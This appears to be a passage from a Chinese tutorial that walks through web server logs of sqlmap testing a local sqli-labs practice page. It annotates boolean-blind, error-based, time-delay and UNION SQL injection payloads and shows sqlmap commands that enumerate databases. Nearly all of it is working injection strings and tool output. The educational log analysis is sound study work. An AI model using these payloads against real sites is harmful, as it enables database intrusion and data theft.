10.211.55.2 - - [02/Nov/2019:09:18:51 +0800] "GET /sqli/Less-1/?id=-8913' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x52744f49757a50454879437574454c547a6f4d5a7962687768576c4c686465534d5863485857696b,0x7170787671)-- EMQz HTTP/1.1" 200 763
10.211.55.2 - - [02/Nov/2019:09:18:52 +0800] "GET /sqli/Less-1/?id=-1568' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,(CASE WHEN (6689=6689) THEN 1 ELSE 0 END),0x7170787671)-- NGYK HTTP/1.1" 200 724
10.211.55.2 - - [02/Nov/2019:09:19:52 +0800] "-" 408 -

感觉一个个手动去替换的话也要耗时不少时间,想到了 BurpSuite 的编码解码功能,直接通过 BP 去解码试试看:

OK 也可以功能正常,那么下面就来简单分析一下这个注入检测的日志。

布尔盲注

# 尝试使用 ) 来闭合前面的语句 两次测试页面返回 721 没有成功
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1) AND 5700=1453 AND (9717=9717 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1) AND 7091=7091 AND (7487=7487 HTTP/1.1" 200 721

# 直接注入 2次测试页面返回 721 没有成功
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1 AND 5946=8467 HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1 AND 7091=7091 HTTP/1.1" 200 721

# 直接注入 使用 -- 注释掉后面的语句 两次测试页面返回 721 没有成功
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1 AND 7606=9874-- Hgwl HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1 AND 7091=7091-- AUkp HTTP/1.1" 200 721


# 使用 ')来闭合前面语句 构造一个判断条件 使用('闭合后面语句 两次测试页面返回 860 没有成功
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1') AND 7695=7758 AND ('cgCi'='cgCi HTTP/1.1" 200 860
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1') AND 7091=7091 AND ('GMtd'='GMtd HTTP/1.1" 200 860

# 使用 ' 来闭合前面语句 构造一个判断条件 使用'闭合后面语句 永真条件页面返回 721 永假条件 页面返回 670  
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND 8885=9726 AND 'wgHB'='wgHB HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND 7091=7091 AND 'BKrj'='BKrj HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND 6775=8339 AND 'VDmE'='VDmE HTTP/1.1" 200 670

接下来就开始详细分析下这 4 种类型注入。

报错注入

报错注入的 payload 是利用 MySQL 的逻辑漏洞,导致恶意 SQL 语句直接在 MySQL 的报错日志显示了出来:

10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(2715=2715,1))),0x7170787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'pTZE'='pTZE HTTP/1.1" 200 985
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(7905=7905,1))),0x7170787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'UvdD'='UvdD HTTP/1.1" 200 985
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(1643=1643,1))),0x7170787671,0x78))x)) AND 'dCkT'='dCkT HTTP/1.1" 200 943
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7176767171,(SELECT (ELT(7989=7989,1))),0x7170787671,0x78))x)) AND 'GJvf'='GJvf HTTP/1.1" 200 943
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176767171,(SELECT (ELT(5275=5275,1))),0x7170787671)) USING utf8))) AND 'tsFH'='tsFH HTTP/1.1" 200 712
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT(0x7176767171,(SELECT (ELT(3959=3959,1))),0x7170787671)) USING utf8))) AND 'LawY'='LawY HTTP/1.1" 200 712
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND (SELECT 7957 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(7957=7957,1))),0x7170787671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'lHCY'='lHCY HTTP/1.1" 200 720
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=(SELECT CONCAT(0x7176767171,(SELECT (ELT(2593=2593,1))),0x7170787671)) HTTP/1.1" 200 670

这里涉及到 MySQL 内置的逻辑问题,一般报错注入比较简单粗暴,将一些特殊的函数拼接起来可以触发,一般大家看到一些奇怪的 payload 的时候就要想到这很有可能是报错注入。

延时盲注

# '; 闭合前面语句 # 闭合后面语句 延时5秒测试
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1';SELECT SLEEP(5)# HTTP/1.1" 200 843

# '; 闭合前面语句 构造'zOkG'='zOkG 用单引号闭合后面语句 延时5秒测试
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1';SELECT SLEEP(5) AND 'zOkG'='zOkG HTTP/1.1" 200 859

# '; 闭合前面语句 # 闭合后面语句 延时5秒测试
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1';(SELECT * FROM (SELECT(SLEEP(5)))czFP)# HTTP/1.1" 200 866

# '; 闭合前面语句 构造'yzqr'='yzqr 用单引号闭合后面语句 延时5秒测试
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1';(SELECT * FROM (SELECT(SLEEP(5)))epZY) AND 'yzqr'='yzqr HTTP/1.1" 200 882

# '; 闭合前面语句 # 闭合后面语句 借助BENCHMARK将MD5(0x53535946)计算5000000次 延时测试
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1';SELECT BENCHMARK(5000000,MD5(0x62414652))# HTTP/1.1" 200 869

# '; 闭合前面语句 构造'SCFh'='SCFh 用单引号 闭合后面语句 借助BENCHMARK将MD5(0x53535946)计算5000000次 延时测试
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1';SELECT BENCHMARK(5000000,MD5(0x53535946)) AND 'SCFh'='SCFh HTTP/1.1" 200 885

# ' 闭合前面语句 构造条件 单引号闭合后面语句 SLEEP延时5秒测试 
10.211.55.2 - - [02/Nov/2019:09:18:41  0800] "GET /sqli/Less-1/?id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(5)))OpvZ) AND 'Mrpf'='Mrpf HTTP/1.1" 200 721

# ' 闭合前面语句 构造条件 单引号闭合后面语句 SLEEP延时0秒测试 
10.211.55.2 - - [02/Nov/2019:09:18:46  0800] "GET /sqli/Less-1/?id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(0)))OpvZ) AND 'Mrpf'='Mrpf HTTP/1.1" 200 721

# ' 闭合前面语句 构造条件 单引号闭合后面语句 SLEEP延时5秒测试 
10.211.55.2 - - [02/Nov/2019:09:18:46  0800] "GET /sqli/Less-1/?id=1' AND (SELECT 9252 FROM (SELECT(SLEEP(5)))OpvZ) AND 'Mrpf'='Mrpf HTTP/1.1" 200 721

联合注入

# 闭合单引号 --闭合后面的语句 ORDER BY 二分法判断字段值最后为3
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' ORDER BY 1-- eClE HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' ORDER BY 1447-- gzBn HTTP/1.1" 200 709
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' ORDER BY 10-- ISlS HTTP/1.1" 200 707
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' ORDER BY 6-- kioI HTTP/1.1" 200 706
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' ORDER BY 4-- ObNO HTTP/1.1" 200 706
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' ORDER BY 3-- swSX HTTP/1.1" 200 721

# 使用select测试一些值
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,CONCAT(0x7176767171,0x474b584c516e644368717a736f49616779704762597574766e526c5a4444715159756f6c70616a54,0x7170787671),NULL-- mhjz HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x61694c43687475757a6442747153624d6454774e5873474555794d7a66574853447271517770564c,0x7170787671)-- uPFk HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT CONCAT(0x7176767171,0x597a525571594c42486f644472774d64427a44464b6f584872534b526f5667456d4e5656697a4a76,0x7170787671),NULL,NULL-- SXNE HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,CONCAT(0x7176767171,0x6f777272525252575767,0x7170787671),NULL-- UKyq HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x58596e52796148654748,0x7170787671)-- MXcU HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=1' UNION ALL SELECT CONCAT(0x7176767171,0x4d6d747555626a58716b,0x7170787671),NULL,NULL-- vsbu HTTP/1.1" 200 721

# 构造永假条件 报错 将UNION查询的值页面显示出来    
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=-7078' UNION ALL SELECT CONCAT(0x7176767171,0x75506e464a585570427a744c6d7a6c5255454d4a71505a6750524777595a4e4671576344644c704f,0x7170787671),NULL,NULL-- CSdm HTTP/1.1" 200 713
10.211.55.2 - - [02/Nov/2019:09:18:51  0800] "GET /sqli/Less-1/?id=-8913' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,0x52744f49757a50454879437574454c547a6f4d5a7962687768576c4c686465534d5863485857696b,0x7170787671)-- EMQz HTTP/1.1" 200 763
10.211.55.2 - - [02/Nov/2019:09:18:52  0800] "GET /sqli/Less-1/?id=-1568' UNION ALL SELECT NULL,NULL,CONCAT(0x7176767171,(CASE WHEN (6689=6689) THEN 1 ELSE 0 END),0x7170787671)-- NGYK HTTP/1.1" 200 724 

注入细节

布尔盲注

进行布尔型注入检测

# 检测注入 --technique=B 制定注入方式为B 布尔类型注入
sqlmap -u "http://10.211.55.3/sqli/Less-1/?id=1" -v 3 --flush-session --technique=B

sqlmap 返回:

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 8074=8074 AND 'JReZ'='JReZ
    Vector: AND [INFERENCE]
---
[14:14:36] [INFO] testing MySQL
[14:14:36] [PAYLOAD] 1' AND QUARTER(NULL) IS NULL AND 'pdaY'='pdaY
[14:14:36] [INFO] confirming MySQL
[14:14:36] [PAYLOAD] 1' AND SESSION_USER() LIKE USER() AND 'uZro'='uZro
[14:14:36] [PAYLOAD] 1' AND VERSION() LIKE 0x254d61726961444225 AND 'VmlX'='VmlX
[14:14:36] [PAYLOAD] 1' AND ISNULL(JSON_STORAGE_FREE(NULL)) AND 'Sbsv'='Sbsv
[14:14:36] [PAYLOAD] 1' AND ISNULL(TIMESTAMPADD(MINUTE,4430,NULL)) AND 'pRkX'='pRkX
[14:14:36] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.23, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0

查询所有数据库

sqlmap -u "http://10.211.55.3/sqli/Less-1/?id=1" -v 3 --technique=B --dbs

sqlmap 返回:

[14:15:33] [INFO] retrieved: test
[14:15:33] [DEBUG] performed 28 queries in 0.15 seconds
available databases [8]:
[*] bbs
[*] challenges
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] security
[*] test

数据库的数量

CAST(COUNT(DISTINCT(schema_name)) AS CHAR)`统计数据库的数量,`chr(56)=8
10.211.55.2 - - [02/Nov/2019:14:16:23  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51 AND 'gZfX'='gZfX HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:14:16:23  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>54 AND 'gZfX'='gZfX HTTP/1.1" 200 721
10.211.55.2 - - [02/Nov/2019:14:16:23  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>56 AND 'gZfX'='gZfX HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:14:16:23  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>55 AND 'gZfX'='gZfX HTTP/1.1" 200 721

information_schema数据库

根据 ascii 码来一个一个字母的判断数据库的名称,可以直接使用 Python 的chr函数来将 ascii 码转换回来:

# chr(106)='i'
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>64 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>106 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1))>105 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(110)='n'
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),2,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:48  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),2,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),2,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),2,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),2,1))>110 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),2,1))>109 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750

# chr(102)='f'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),3,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),3,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),3,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),3,1))>100 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),3,1))>102 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),3,1))>101 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750

# chr(111)='o'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),4,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),4,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),4,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),4,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),4,1))>110 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),4,1))>111 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(114)='r'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),5,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),5,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),5,1))>120 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),5,1))>116 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),5,1))>114 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),5,1))>113 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750

# chr(109)='m'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),6,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),6,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),6,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),6,1))>108 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),6,1))>110 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),6,1))>109 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(97)='a'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),7,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),7,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),7,1))>104 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),7,1))>100 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),7,1))>98 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),7,1))>97 AND 'XYZJ'='XYZJ HTTP/1.1" 200 670

# chr(116)='t'
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),8,1))>96 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
10.211.55.2 - - [02/Nov/2019:18:52:49  0800] "GET /sqli/Less-1/?id=1' AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),8,1))>112 AND 'XYZJ'='XYZJ HTTP/1.1" 200 750
